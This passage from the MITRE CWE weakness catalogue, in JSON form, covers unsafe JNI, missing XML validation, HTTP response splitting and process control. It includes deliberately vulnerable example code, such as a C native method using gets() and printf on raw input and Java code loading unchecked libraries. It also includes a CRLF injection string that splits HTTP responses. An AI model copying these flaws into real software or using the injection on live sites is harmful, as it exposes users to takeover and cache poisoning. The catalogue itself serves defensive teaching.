checking.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"695","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"700","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Implement error handling around the JNI call."},{"Phase":"Implementation","Strategy":"Refactoring","Description":"Do not use JNI calls if you don\'t trust the native library."},{"Phase":"Implementation","Strategy":"Refactoring","Description":"Be reluctant to use JNI calls. A Java API equivalent may exist."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following code defines a class named Echo. The class declares one native method (defined below), which uses C to echo commands entered on the console back to the user. The following C code defines the native method implemented in the Echo class:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"class Echo {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"public native void runEcho();static {}public static void main(String[] args) {}","xhtml:br":["","",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"System.loadLibrary(\\"echo\\");","xhtml:br":""}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"new Echo().runEcho();","xhtml:br":""}}]}}}},{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"#include &lt;jni.h&gt;#include \\"Echo.h\\"//the java class above compiled with javah#include &lt;stdio.h&gt;JNIEXPORT void JNICALLJava_Echo_runEcho(JNIEnv *env, jobject obj){}","xhtml:br":["","","","","",""],"xhtml:div":{"#text":"char buf[64];gets(buf);printf(buf);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}}],"Body_Text":["Because the example is implemented in Java, it may appear that it is immune to memory issues like buffer overflow vulnerabilities. Although Java does do a good job of making memory operations safe, this protection does not extend to vulnerabilities occurring in source code written in other languages that are accessed using the Java Native Interface. Despite the memory protections offered in Java, the C code in this example is vulnerable to a buffer overflow because it makes use of gets(), which does not check the length of its input.","The Sun Java(TM) Tutorial provides the following description of JNI [See Reference]: The JNI framework lets your native method utilize Java objects in the same way that Java code uses these objects. A native method can create Java objects, including arrays and strings, and then inspect and use these objects to perform its tasks. A native method can also inspect and use objects created by Java application code. A native method can even update Java objects that it created or that were passed to it, and these updated objects are available to the Java application. Thus, both the native language side and the Java side of an application can create, update, and access Java objects and then share these objects between them.","The vulnerability in the example above could easily be detected through a source code audit of the native method implementation. This may not be practical or possible depending on the availability of the C source code and the way the project is built, but in many cases it may suffice. However, the ability to share objects between Java and native methods expands the potential risk to much more insidious cases where improper data handling in Java may lead to unexpected vulnerabilities in native code or unsafe operations in native code corrupt data structures in Java. Vulnerabilities in native code accessed through a Java application are typically exploited in the same manner as they are in applications written in the native language. The only challenge to such an attack is for the attacker to identify that the Java application uses native code to perform certain operations. This can be accomplished in a variety of ways, including identifying specific behaviors that are often implemented with native code or by exploiting a system information exposure in the Java application that reveals its use of JNI [See Reference]."]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Unsafe JNI"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"SEC08-J","Entry_Name":"Define wrappers around native methods"},{"attr":{"@_Taxonomy_Name":"SEI CERT Oracle Coding Standard for Java"},"Entry_ID":"JNI01-J","Entry_Name":"Safely invoke standard APIs that perform tasks using the immediate caller\'s class loader instance (loadLibrary)"},{"attr":{"@_Taxonomy_Name":"SEI CERT Oracle Coding Standard for Java"},"Entry_ID":"JNI00-J","Entry_Name":"Define wrappers around native methods","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP3","Entry_Name":"Use of an improper API"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-6"}},{"attr":{"@_External_Reference_ID":"REF-41"}},{"attr":{"@_External_Reference_ID":"REF-42"}}]},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Demonstrative_Example, Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, References, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Causal_Nature, Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Description"}],"Previous_Entry_Name":{"#text":"Unsafe JNI","attr":{"@_Date":"2008-04-11"}}}},"112":{"attr":{"@_ID":"112","@_Name":"Missing XML Validation","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software accepts XML from an untrusted source but does not validate the XML against the proper schema.","Extended_Description":"Most successful attacks begin with a violation of the programmer\'s assumptions. By accepting an XML document without validating it against a DTD or XML schema, the programmer leaves a door open for attackers to provide unexpected, unreasonable, or malicious input.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1286","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"700","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Strategy":"Input Validation","Description":{"xhtml:p":["Always validate XML input against a known XML Schema or DTD.","It is not possible for an XML parser to validate all aspects of a document\'s content because a parser cannot understand the complete semantics of the data. However, a parser can do a complete and thorough job of checking the document\'s structure and therefore guarantee to the code that processes the document that the content is well-formed."]}}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following code loads and parses an XML file.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"try {} catch(Exception ex) {}","xhtml:br":["",""],"xhtml:i":"// Read DOM","xhtml:div":[{"#text":"...DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();factory.setValidating( false );....c_dom = factory.newDocumentBuilder().parse( xmlFile );","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""]},{"#text":"...","attr":{"@_style":"margin-left:10px;"}}]}},"Body_Text":"The XML file is loaded without validating it against a known XML Schema or DTD."},{"Intro_Text":"The following code creates a DocumentBuilder object to be used in building an XML document.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"DocumentBuilderFactory builderFactory = DocumentBuilderFactory.newInstance();builderFactory.setNamespaceAware(true);DocumentBuilder builder = builderFactory.newDocumentBuilder();","xhtml:br":["",""]}},"Body_Text":"The DocumentBuilder object does not validate an XML document against a schema, making it possible to create an invalid XML document."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Missing XML Validation"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"230"}},{"attr":{"@_CAPEC_ID":"231"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Demonstrative_Example, Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Demonstrative_Examples, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Relationships"}]}},"113":{"attr":{"@_ID":"113","@_Name":"Improper Neutralization of CRLF Sequences in HTTP Headers (\'HTTP Response Splitting\')","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software receives data from an upstream component, but does not neutralize or incorrectly neutralizes CR and LF characters before the data is included in outgoing HTTP headers.","Extended_Description":{"xhtml:p":["Including unvalidated data in an HTTP header allows an attacker to specify the entirety of the HTTP response rendered by the browser. When an HTTP request contains unexpected CR (carriage return, also given by %0d or \\\\r) and LF (line feed, also given by %0a or \\\\n) characters the server may respond with an output stream that is interpreted as two different HTTP responses (instead of one). An attacker can control the second response and mount attacks such as cross-site scripting and cache poisoning attacks.","HTTP response splitting weaknesses may be present when:"],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ol":{"xhtml:li":["Data enters a web application through an untrusted source, most frequently an HTTP request.","The data is included in an HTTP response header sent to a web user without being validated for malicious characters."]}}},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"93","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"79","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"700","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Web Based","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Access Control"],"Impact":["Modify Application Data","Gain Privileges or Assume Identity"],"Note":"CR and LF characters in an HTTP header may give attackers control of the remaining headers and body of the response the application intends to send, as well as allowing them to create additional responses entirely under their control."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Strategy":"Input Validation","Description":"Construct HTTP headers very carefully, avoiding the use of non-validated input data."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-30"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are inconsistent, the downstream component might treat some character or byte sequences as special, even if they are not special in the original encoding. Attackers might then be able to exploit this discrepancy and conduct injection attacks; they even might be able to bypass protection mechanisms that assume the original encoding is also being used by the downstream component."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following code segment reads the name of the author of a weblog entry, author, from an HTTP request and sets it in a cookie header of an HTTP response.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String author = request.getParameter(AUTHOR_PARAM);...Cookie cookie = new Cookie(\\"author\\", author);cookie.setMaxAge(cookieExpiration);response.addCookie(cookie);","xhtml:br":["","","",""]}},{"attr":{"@_Nature":"result"},"xhtml:div":{"#text":"HTTP/1.1 200 OK...Set-Cookie: author=Jane Smith...","xhtml:br":["","",""]}},{"attr":{"@_Nature":"attack"},"xhtml:div":"Wiley Hacker\\\\r\\\\nHTTP/1.1 200 OK\\\\r\\\\n"},{"attr":{"@_Nature":"result"},"xhtml:div":{"#text":"HTTP/1.1 200 OK...Set-Cookie: author=Wiley Hacker HTTP/1.1 200 OK...","xhtml:br":["","",""]}}],"Body_Text":["Assuming a string consisting of standard alpha-numeric characters, such as \\"Jane Smith\\", is submitted in the request the HTTP response including this cookie might take the following form:","However, because the value of the cookie is formed of unvalidated user input the response will only maintain this form if the value submitted for AUTHOR_PARAM does not contain any CR and LF characters. If an attacker submits a malicious string, such as","then the HTTP response would be split into two responses of the following form:","Clearly, the second response is completely controlled by the attacker and can be constructed with any header and body content desired. The ability of attacker to construct arbitrary HTTP responses permits a variety of resulting attacks, including:",{"xhtml:ul":{"xhtml:li":[{"xhtml:div":"cross-user defacement"},{"xhtml:div":"web and browser cache poisoning"},{"xhtml:div":"cross-site scripting"},{"xhtml:div":"page hijacking"}]}}]},{"Intro_Text":"An attacker can make a single request to a vulnerable server that will cause the server to create two responses, the second of which may be misinterpreted as a response to a different request, possibly one made by another user sharing the same TCP connection with the sever.","Body_Text":{"xhtml:div":{"xhtml:div":[{"#text":"Cross-User Defacement","attr":{"@_style":"color:#32498D; font-weight:bold;"}},"This can be accomplished by convincing the user to submit the malicious request themselves, or remotely in situations where the attacker and the user share a common TCP connection to the server, such as a shared proxy server.",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":[{"xhtml:div":"In the best case, an attacker can leverage this ability to convince users that the application has been hacked, causing users to lose confidence in the security of the application."},{"xhtml:div":"In the worst case, an attacker may provide specially crafted content designed to mimic the behavior of the application but redirect private information, such as account numbers and passwords, back to the attacker."}]}}]}}},{"Intro_Text":"The impact of a maliciously constructed response can be magnified if it is cached either by a web cache used by multiple users or even the browser cache of a single user.","Body_Text":{"xhtml:div":{"xhtml:div":[{"#text":"Cache Poisoning","attr":{"@_style":"color:#32498D; font-weight:bold;"}},"If a response is cached in a shared web cache, such as those commonly found in proxy servers, then all users of that cache will continue receive the malicious content until the cache entry is purged. Similarly, if the response is cached in the browser of an individual user, then that user will continue to receive the malicious content until the cache entry is purged, although the user of the local browser instance will be affected."]}}},{"Intro_Text":"Once attackers have control of the responses sent by an application, they have a choice of a variety of malicious content to provide users.","Body_Text":{"xhtml:div":{"xhtml:div":[{"#text":"Cross-Site Scripting","attr":{"@_style":"color:#32498D; font-weight:bold;"}},"Cross-site scripting is common form of attack where malicious JavaScript or other code included in a response is executed in the user\'s browser.","The variety of attacks based on XSS is almost limitless, but they commonly include transmitting private data like cookies or other session information to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user\'s machine under the guise of the vulnerable site.","The most common and dangerous attack vector against users of a vulnerable application uses JavaScript to transmit session and authentication information back to the attacker who can then take complete control of the victim\'s account."]}}},{"Intro_Text":"In addition to using a vulnerable application to send malicious content to a user, the same root vulnerability can also be leveraged to redirect sensitive content generated by the server and intended for the user to the attacker instead.","Body_Text":{"xhtml:div":{"xhtml:div":[{"#text":"Page Hijacking","attr":{"@_style":"color:#32498D; font-weight:bold;"}},"By submitting a request that results in two responses, the intended response from the server and the response generated by the attacker, an attacker can cause an intermediate node, such as a shared proxy server, to misdirect a response generated by the server for the user to the attacker.","Because the request made by the attacker generates two responses, the first is interpreted as a response to the attacker\'s request, while the second remains in limbo. When the user makes a legitimate request through the same TCP connection, the attacker\'s request is already waiting and is interpreted as a response to the victim\'s request. The attacker then sends a second request to the server, to which the proxy server responds with the server generated request intended for the victim, thereby compromising any sensitive information in the headers or body of the response intended for the victim."]}}}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2004-2146","Description":"Application accepts CRLF in an object ID, allowing HTTP response splitting.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2146"},{"Reference":"CVE-2004-1620","Description":"HTTP response splitting via CRLF in parameter related to URL.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1620"},{"Reference":"CVE-2004-1656","Description":"HTTP response splitting via CRLF in parameter related to URL.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1656"},{"Reference":"CVE-2005-2060","Description":"Bulletin board allows response splitting via CRLF in parameter.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2060"},{"Reference":"CVE-2005-2065","Description":"Bulletin board allows response splitting via CRLF in parameter.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2065"},{"Reference":"CVE-2004-2512","Description":"Response splitting via CRLF in PHPSESSID.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2512"},{"Reference":"CVE-2005-1951","Description":"Chain: Application accepts CRLF in an object ID, allowing HTTP response splitting.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1951"},{"Reference":"CVE-2004-1687","Description":"Chain: HTTP response splitting via CRLF in parameter related to URL.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1687"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"HTTP response splitting"},{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"HTTP Response Splitting"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":25,"Entry_Name":"HTTP Response Splitting"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"31"}},{"attr":{"@_CAPEC_ID":"34"}},{"attr":{"@_CAPEC_ID":"85"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-43"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 2: Web-Server Related Vulnerabilities (XSS, XSRF, and Response Splitting).&#34; Page 31"}}]},"Notes":{"Note":{"#text":"HTTP response splitting is probably only multi-factor in an environment that uses intermediaries.","attr":{"@_Type":"Theoretical"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated References, Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Observed_Example, Other_Notes, References, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences, Description, Other_Notes, Theoretical_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Potential_Mitigations, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"HTTP Response Splitting","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize CRLF Sequences in HTTP Headers (aka \'HTTP Response Splitting\')","attr":{"@_Date":"2009-05-27"}},{"#text":"Failure to Sanitize CRLF Sequences in HTTP Headers (\'HTTP Response Splitting\')","attr":{"@_Date":"2010-06-21"}}]}},"114":{"attr":{"@_ID":"114","@_Name":"Process Control","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Executing commands or loading libraries from an untrusted source or in an untrusted environment can cause an application to execute malicious commands (and payloads) on behalf of an attacker.","Extended_Description":"Process control vulnerabilities take two forms: 1. An attacker can change the command that the program executes: the attacker explicitly controls what the command is. 2. An attacker can change the environment in which the command executes: the attacker implicitly controls what the command means. Process control vulnerabilities of the first type occur when either data enters the application from an untrusted source and the data is used as part of a string representing a command that is executed by the application. By executing the command, the application gives an attacker a privilege or capability that the attacker would not otherwise have.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"73","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"700","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Code or Commands"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":"Libraries that are loaded should be well understood and come from a trusted source. The application can execute code contained in the native libraries, which often contain calls that are susceptible to other security problems, such as buffer overflows or command injection. All native libraries should be validated to determine if the application requires the use of the library. It is very difficult to determine what these native libraries actually do, and the potential for malicious code is high. In addition, the potential for an inadvertent mistake in these native libraries is also high, as many are written in C or C++ and may be susceptible to buffer overflow or race condition problems. To help prevent buffer overflow attacks, validate all input to native calls for content and length. If the native library does not come from a trusted source, review the source code of the library. The library should be built from the reviewed source before using it."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following code uses System.loadLibrary() to load code from a native library named library.dll, which is normally found in a standard system directory.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"...System.loadLibrary(\\"library.dll\\");...","xhtml:br":["",""]}},"Body_Text":"The problem here is that System.loadLibrary() accepts a library name, not a path, for the library to be loaded. From the Java 1.4.2 API documentation this function behaves as follows [1]: A file containing native code is loaded from the local file system from a place where library files are conventionally obtained. The details of this process are implementation-dependent. The mapping from a library name to a specific filename is done in a system-specific manner. If an attacker is able to place a malicious copy of library.dll higher in the search order than file the application intends to load, then the application will load the malicious copy instead of the intended file. Because of the nature of the application, it runs with elevated privileges, which means the contents of the attacker\'s library.dll will now be run with elevated privileges, possibly giving them complete control of the system."},{"Intro_Text":"The following code from a privileged application uses a registry entry to determine the directory in which it is installed and loads a library file based on a relative path from the specified directory.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"...RegQueryValueEx(hkey, \\"APPHOME\\",0, 0, (BYTE*)home, &amp;size);char* lib=(char*)malloc(strlen(home)+strlen(INITLIB));if (lib) {}...","xhtml:br":["","","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"strcpy(lib,home);strcat(lib,INITCMD);LoadLibrary(lib);","xhtml:br":["","",""]}}}},"Body_Text":"The code in this example allows an attacker to load an arbitrary library, from which code will be executed with the elevated privilege of the application, by modifying a registry key to specify a different path containing a malicious version of INITLIB. Because the program does not 